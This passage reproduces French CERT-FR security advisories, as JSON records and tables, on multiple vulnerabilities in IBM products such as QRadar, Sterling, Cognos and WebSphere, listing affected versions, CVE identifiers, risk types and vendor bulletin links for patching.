"url": "https://www.cve.org/CVERecord?id=CVE-2024-53197"
},
{
"name": "CVE-2025-43859",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43859"
},
{
"name": "CVE-2024-30172",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30172"
},
{
"name": "CVE-2024-51744",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51744"
},
{
"name": "CVE-2024-45338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45338"
},
{
"name": "CVE-2024-23454",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23454"
},
{
"name": "CVE-2022-3510",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3510"
},
{
"name": "CVE-2022-3509",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3509"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-21634",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21634"
},
{
"name": "CVE-2024-29131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29131"
},
{
"name": "CVE-2024-37529",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37529"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2021-25642",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-25642"
},
{
"name": "CVE-2024-53382",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53382"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2023-39410",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39410"
},
{
"name": "CVE-2024-25710",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25710"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2020-9492",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9492"
},
{
"name": "CVE-2025-27220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27220"
},
{
"name": "CVE-2024-29133",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29133"
},
{
"name": "CVE-2019-16943",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16943"
},
{
"name": "CVE-2024-12905",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12905"
},
{
"name": "CVE-2024-41946",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41946"
},
{
"name": "CVE-2024-52046",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52046"
},
{
"name": "CVE-2021-37404",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37404"
},
{
"name": "CVE-2025-47935",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47935"
},
{
"name": "CVE-2017-7525",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7525"
},
{
"name": "CVE-2019-20330",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20330"
},
{
"name": "CVE-2023-44981",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44981"
},
{
"name": "CVE-2024-34156",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34156"
},
{
"name": "CVE-2019-17531",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17531"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2023-52428",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52428"
},
{
"name": "CVE-2024-25062",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25062"
},
{
"name": "CVE-2020-8840",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-8840"
},
{
"name": "CVE-2024-10963",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10963"
},
{
"name": "CVE-2024-57965",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57965"
},
{
"name": "CVE-2023-29267",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29267"
},
{
"name": "CVE-2024-31882",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31882"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2024-4603",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4603"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2018-14720",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14720"
},
{
"name": "CVE-2024-47176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47176"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2024-30171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30171"
},
{
"name": "CVE-2023-52922",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52922"
},
{
"name": "CVE-2019-14540",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14540"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2024-6827",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6827"
},
{
"name": "CVE-2018-14721",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14721"
},
{
"name": "CVE-2018-11307",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11307"
},
{
"name": "CVE-2024-3651",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3651"
},
{
"name": "CVE-2025-27363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27363"
},
{
"name": "CVE-2022-42969",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42969"
},
{
"name": "CVE-2025-24928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24928"
},
{
"name": "CVE-2024-41091",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41091"
},
{
"name": "CVE-2024-35152",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35152"
},
{
"name": "CVE-2019-14379",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14379"
},
{
"name": "CVE-2025-25032",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25032"
},
{
"name": "CVE-2023-42282",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42282"
},
{
"name": "CVE-2025-30204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30204"
},
{
"name": "CVE-2022-3171",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3171"
},
{
"name": "CVE-2024-47175",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47175"
},
{
"name": "CVE-2024-41123",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41123"
},
{
"name": "CVE-2023-39663",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39663"
},
{
"name": "CVE-2024-35136",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35136"
},
{
"name": "CVE-2022-25168",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25168"
},
{
"name": "CVE-2024-49761",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49761"
},
{
"name": "CVE-2024-6345",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6345"
},
{
"name": "CVE-2019-14892",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14892"
}
],
"initial_release_date": "2025-06-13T00:00:00",
"last_revision_date": "2025-06-13T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0512",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-06-13T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-06-12",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7236500",
"url": "https://www.ibm.com/support/pages/node/7236500"
},
{
"published_at": "2025-06-11",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7234674",
"url": "https://www.ibm.com/support/pages/node/7234674"
},
{
"published_at": "2025-06-11",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7236354",
"url": "https://www.ibm.com/support/pages/node/7236354"
}
]
}
CERTFR-2025-AVI-0481
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
References
| Title | Publication Time | Tags | ||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "IBM Cloud Pak for Security versions 1.10.x ant\u00e9rieures \u00e0 1.11.3.0",
"product": {
"name": "Cloud Pak",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Suite Software versions post\u00e9rieures \u00e0 1.10.12.0 et ant\u00e9rieures \u00e0 1.11.3.0 ",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-32996",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32996"
},
{
"name": "CVE-2019-11038",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11038"
},
{
"name": "CVE-2021-38593",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-38593"
},
{
"name": "CVE-2025-1334",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1334"
},
{
"name": "CVE-2020-15250",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15250"
},
{
"name": "CVE-2023-37920",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37920"
},
{
"name": "CVE-2024-0793",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0793"
},
{
"name": "CVE-2017-9047",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-9047"
},
{
"name": "CVE-2024-49766",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49766"
},
{
"name": "CVE-2024-56326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56326"
},
{
"name": "CVE-2024-56171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56171"
},
{
"name": "CVE-2024-38819",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38819"
},
{
"name": "CVE-2025-27144",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27144"
},
{
"name": "CVE-2022-49043",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49043"
},
{
"name": "CVE-2024-11831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11831"
},
{
"name": "CVE-2025-30691",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30691"
},
{
"name": "CVE-2024-38809",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38809"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-47764",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47764"
},
{
"name": "CVE-2023-52355",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52355"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2024-56337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56337"
},
{
"name": "CVE-2025-32997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32997"
},
{
"name": "CVE-2024-9902",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9902"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-56332",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56332"
},
{
"name": "CVE-2024-56201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56201"
},
{
"name": "CVE-2024-38827",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38827"
},
{
"name": "CVE-2023-43804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43804"
},
{
"name": "CVE-2025-25019",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25019"
},
{
"name": "CVE-2020-35538",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35538"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2025-26791",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26791"
},
{
"name": "CVE-2024-49767",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49767"
},
{
"name": "CVE-2024-38828",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38828"
},
{
"name": "CVE-2018-5711",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-5711"
},
{
"name": "CVE-2023-1916",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1916"
},
{
"name": "CVE-2025-25022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25022"
},
{
"name": "CVE-2025-25020",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25020"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"name": "CVE-2022-1354",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1354"
},
{
"name": "CVE-2025-25021",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25021"
},
{
"name": "CVE-2024-52304",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52304"
},
{
"name": "CVE-2023-24607",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24607"
},
{
"name": "CVE-2025-22235",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22235"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2024-57556",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57556"
},
{
"name": "CVE-2025-27363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27363"
},
{
"name": "CVE-2025-24928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24928"
},
{
"name": "CVE-2024-50379",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50379"
},
{
"name": "CVE-2023-24056",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24056"
},
{
"name": "CVE-2024-38816",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38816"
},
{
"name": "CVE-2024-52317",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52317"
},
{
"name": "CVE-2024-52316",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52316"
},
{
"name": "CVE-2022-3570",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3570"
}
],
"initial_release_date": "2025-06-06T00:00:00",
"last_revision_date": "2025-06-06T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0481",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-06-06T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-06-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7235432",
"url": "https://www.ibm.com/support/pages/node/7235432"
},
{
"published_at": "2025-06-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7235402",
"url": "https://www.ibm.com/support/pages/node/7235402"
}
]
}
CERTFR-2025-AVI-0746
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Cognos Dashboards | Cognos Command Center versions 10.2.4.1 et 10.2.5 antérieures à 10.2.5 FP1 IF1 | ||
| IBM | Sterling | Sterling Secure Proxy versions 6.1.0.x antérieures à 6.1.0.2 GA | ||
| IBM | QRadar | QRadar SIEM versions 7.5.0 antérieures à QRadar 7.5.0 UP13 IF01 | ||
| IBM | Sterling | Sterling Connect:Direct pour Microsoft Windows versions 6.4.x antérieures à 6.4.0.3 | ||
| IBM | WebSphere | WebSphere Remote Server versions 9.1, 8.0 et 8.5 sans le dernier correctif de sécurité | ||
| IBM | Cognos Dashboards | Cognos Dashboards on Cloud Pak for Data versions 5.x antérieures à 5.2.1 | ||
| IBM | Sterling | Sterling Secure Proxy versions 6.2.0.x antérieures à 6.2.0.2 GA | ||
| IBM | QRadar | QRadar Incident Forensics versions 7.5.0 antérieures à QIF 7.5.0 UP13 IF01 | ||
| IBM | Sterling | Sterling External Authentication Server versions 6.1.0.x antérieures à 6.1.0.3 GA | ||
| IBM | Sterling | Sterling Connect:Direct pour Microsoft Windows versions 6.3.x antérieures à 6.3.0.6 | ||
| IBM | Db2 | Db2 Bridge versions antérieures à 1.1.1 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Cognos Command Center versions 10.2.4.1 et 10.2.5 ant\u00e9rieures \u00e0 10.2.5 FP1 IF1",
"product": {
"name": "Cognos Dashboards",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Secure Proxy versions 6.1.0.x ant\u00e9rieures \u00e0 6.1.0.2 GA",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar SIEM versions 7.5.0 ant\u00e9rieures \u00e0 QRadar 7.5.0 UP13 IF01",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct pour Microsoft Windows versions 6.4.x ant\u00e9rieures \u00e0 6.4.0.3",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Remote Server versions 9.1, 8.0 et 8.5 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Dashboards on Cloud Pak for Data versions 5.x ant\u00e9rieures \u00e0 5.2.1",
"product": {
"name": "Cognos Dashboards",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Secure Proxy versions 6.2.0.x ant\u00e9rieures \u00e0 6.2.0.2 GA",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Incident Forensics versions 7.5.0 ant\u00e9rieures \u00e0 QIF 7.5.0 UP13 IF01",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling External Authentication Server versions 6.1.0.x ant\u00e9rieures \u00e0 6.1.0.3 GA",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct pour Microsoft Windows versions 6.3.x ant\u00e9rieures \u00e0 6.3.0.6",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 Bridge versions ant\u00e9rieures \u00e0 1.1.1",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-6531",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6531"
},
{
"name": "CVE-2025-4447",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4447"
},
{
"name": "CVE-2024-21144",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21144"
},
{
"name": "CVE-2025-24789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24789"
},
{
"name": "CVE-2022-50020",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50020"
},
{
"name": "CVE-2025-47944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47944"
},
{
"name": "CVE-2024-50349",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50349"
},
{
"name": "CVE-2025-46835",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46835"
},
{
"name": "CVE-2024-57980",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57980"
},
{
"name": "CVE-2024-43420",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43420"
},
{
"name": "CVE-2025-49794",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49794"
},
{
"name": "CVE-2025-22004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22004"
},
{
"name": "CVE-2025-27614",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27614"
},
{
"name": "CVE-2022-49111",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49111"
},
{
"name": "CVE-2025-1470",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1470"
},
{
"name": "CVE-2022-49058",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49058"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2024-52006",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52006"
},
{
"name": "CVE-2025-4373",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4373"
},
{
"name": "CVE-2024-13009",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-13009"
},
{
"name": "CVE-2025-50106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50106"
},
{
"name": "CVE-2025-48385",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48385"
},
{
"name": "CVE-2025-48060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48060"
},
{
"name": "CVE-2024-50154",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50154"
},
{
"name": "CVE-2025-27613",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27613"
},
{
"name": "CVE-2025-30754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30754"
},
{
"name": "CVE-2024-10917",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10917"
},
{
"name": "CVE-2022-49136",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49136"
},
{
"name": "CVE-2025-6965",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6965"
},
{
"name": "CVE-2022-49846",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49846"
},
{
"name": "CVE-2019-17543",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17543"
},
{
"name": "CVE-2025-38086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38086"
},
{
"name": "CVE-2025-48384",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48384"
},
{
"name": "CVE-2025-7783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2025-1471",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1471"
},
{
"name": "CVE-2025-38079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38079"
},
{
"name": "CVE-2025-20012",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-20012"
},
{
"name": "CVE-2025-7425",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7425"
},
{
"name": "CVE-2025-37738",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37738"
},
{
"name": "CVE-2024-53920",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53920"
},
{
"name": "CVE-2025-48976",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48976"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2025-52520",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52520"
},
{
"name": "CVE-2024-52533",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52533"
},
{
"name": "CVE-2024-28956",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28956"
},
{
"name": "CVE-2025-2697",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2697"
},
{
"name": "CVE-2025-47935",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47935"
},
{
"name": "CVE-2025-50059",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50059"
},
{
"name": "CVE-2025-21928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21928"
},
{
"name": "CVE-2025-30761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30761"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2025-1494",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1494"
},
{
"name": "CVE-2025-1994",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1994"
},
{
"name": "CVE-2025-52434",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52434"
},
{
"name": "CVE-2025-24495",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24495"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2022-49977",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49977"
},
{
"name": "CVE-2024-54661",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54661"
},
{
"name": "CVE-2025-37890",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37890"
},
{
"name": "CVE-2025-22020",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22020"
},
{
"name": "CVE-2025-27533",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27533"
},
{
"name": "CVE-2025-6021",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6021"
},
{
"name": "CVE-2025-55668",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55668"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2024-58002",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58002"
},
{
"name": "CVE-2025-32415",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32415"
},
{
"name": "CVE-2025-21905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21905"
},
{
"name": "CVE-2024-23337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23337"
},
{
"name": "CVE-2025-30749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30749"
},
{
"name": "CVE-2025-38052",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38052"
},
{
"name": "CVE-2025-2900",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2900"
},
{
"name": "CVE-2025-53506",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53506"
},
{
"name": "CVE-2019-5427",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-5427"
},
{
"name": "CVE-2022-49788",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49788"
},
{
